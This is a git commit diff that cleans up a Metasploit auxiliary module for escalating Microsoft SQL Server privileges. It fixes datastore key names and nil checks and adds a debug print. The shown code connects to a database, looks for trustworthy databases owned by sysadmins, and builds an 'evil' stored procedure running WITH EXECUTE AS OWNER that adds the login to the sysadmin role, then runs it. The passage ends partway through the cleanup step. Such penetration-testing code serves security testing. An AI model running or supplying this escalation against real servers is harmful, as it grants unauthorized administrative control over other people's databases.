Do final cleanup

bug/bundler_fix
jvazquez-r7 2014-10-09 11:38:45 -05:00
parent bbe435f5c9
commit 10b160bedd
1 changed files with 8 additions and 7 deletions


@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary
def run def run
# Check connection and issue initial query # Check connection and issue initial query
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['username']}...") print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
if mssql_login_datastore if mssql_login_datastore
print_good('Connected.') print_good('Connected.')
else else
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
# Check if user has sysadmin role # Check if user has sysadmin role
if user_status == 1 if user_status == 1
print_good("#{datastore['username']} has the sysadmin role, no escalation required.") print_good("#{datastore['USERNAME']} has the sysadmin role, no escalation required.")
disconnect disconnect
return return
else else
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
# Check for trusted databases owned by sysadmins # Check for trusted databases owned by sysadmins
print_status("Checking for trusted databases owned by sysadmins...") print_status("Checking for trusted databases owned by sysadmins...")
trust_db_list = check_trust_dbs trust_db_list = check_trust_dbs
if trust_db_list.length == 0 if trust_db_list.nil? || trust_db_list.length == 0
print_error('No databases owned by sysadmin were found flagged as trustworthy.') print_error('No databases owned by sysadmin were found flagged as trustworthy.')
disconnect disconnect
return return
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
# Check if the user has the db_owner role in any of the databases # Check if the user has the db_owner role in any of the databases
print_status('Checking if the user has the db_owner role in any of them...') print_status('Checking if the user has the db_owner role in any of them...')
dbowner_status = check_db_owner(trust_db_list) dbowner_status = check_db_owner(trust_db_list)
if dbowner_status == 0 if dbowner_status.nil?
print_error("Fail buckets, the user doesn't have db_owner role anywhere.") print_error("Fail buckets, the user doesn't have db_owner role anywhere.")
disconnect disconnect
return return
@ -141,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
# Parse query results # Parse query results
parse_results = result[:rows] parse_results = result[:rows]
if parse_results.any? if parse_results && parse_results.any?
print_good("- db_owner on #{db[0]} found!") print_good("- db_owner on #{db[0]} found!")
return db[0] return db[0]
end end
@ -151,6 +151,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def escalate_privs(dbowner_db) def escalate_privs(dbowner_db)
print_status("#{dbowner_db}")
# Create the evil stored procedure WITH EXECUTE AS OWNER # Create the evil stored procedure WITH EXECUTE AS OWNER
evil_sql_create = "use #{dbowner_db}; evil_sql_create = "use #{dbowner_db};
DECLARE @myevil as varchar(max) DECLARE @myevil as varchar(max)
@ -159,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary
WITH EXECUTE AS OWNER WITH EXECUTE AS OWNER
as as
begin begin
EXEC sp_addsrvrolemember ''#{datastore['username']}'',''sysadmin'' EXEC sp_addsrvrolemember ''#{datastore['USERNAME']}'',''sysadmin''
end'; end';
exec(@myevil); exec(@myevil);
select 1;" select 1;"
@ -170,7 +171,7 @@ class Metasploit3 < Msf::Auxiliary
DECLARE @myevil2 as varchar(max) DECLARE @myevil2 as varchar(max)
set @myevil2 = 'EXEC sp_elevate_me' set @myevil2 = 'EXEC sp_elevate_me'
exec(@myevil2);" exec(@myevil2);"
mssql_query(evil_sql_create) mssql_query(evilsql_run)
# Remove evil procedure # Remove evil procedure
evilsql_remove = "use #{dbowner_db}; evilsql_remove = "use #{dbowner_db};